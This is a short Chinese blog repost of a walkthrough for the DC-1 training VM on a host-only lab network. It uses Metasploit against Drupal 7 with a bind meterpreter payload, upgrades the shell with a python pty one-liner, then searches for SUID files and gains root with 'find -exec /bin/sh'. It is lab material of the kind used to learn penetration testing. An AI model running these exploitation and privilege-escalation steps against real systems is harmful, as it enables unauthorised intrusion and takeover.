码迷,mamicode.com
首页 > 其他好文 > 详细

DC1(msf drupal7+suid-find提权)

时间:2020-01-23 09:18:43      阅读:78      评论:0      收藏:0      [点我收藏+]

标签:mic   python   perm   pytho   png   img   info   nbsp   src   

这边我们靶机是仅主机模式,IP是192.168.56.101,,直接上msf拿到shell,  不过payload要改一下 改成php/meterperter/bind_tcp

 

技术图片

 

 

 

拿到shell了 ,采用交互式

python -c "import pty;pty.spawn(‘/bin/bash‘)"

 

find / -type f -perm -u=s 2>/dev/null #find查看root
find /var/www -exec "/bin/sh" \; # find提权

 

 

技术图片

DC1(msf drupal7+suid-find提权)

标签:mic   python   perm   pytho   png   img   info   nbsp   src   

原文地址:https://www.cnblogs.com/kuaile1314/p/12229986.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!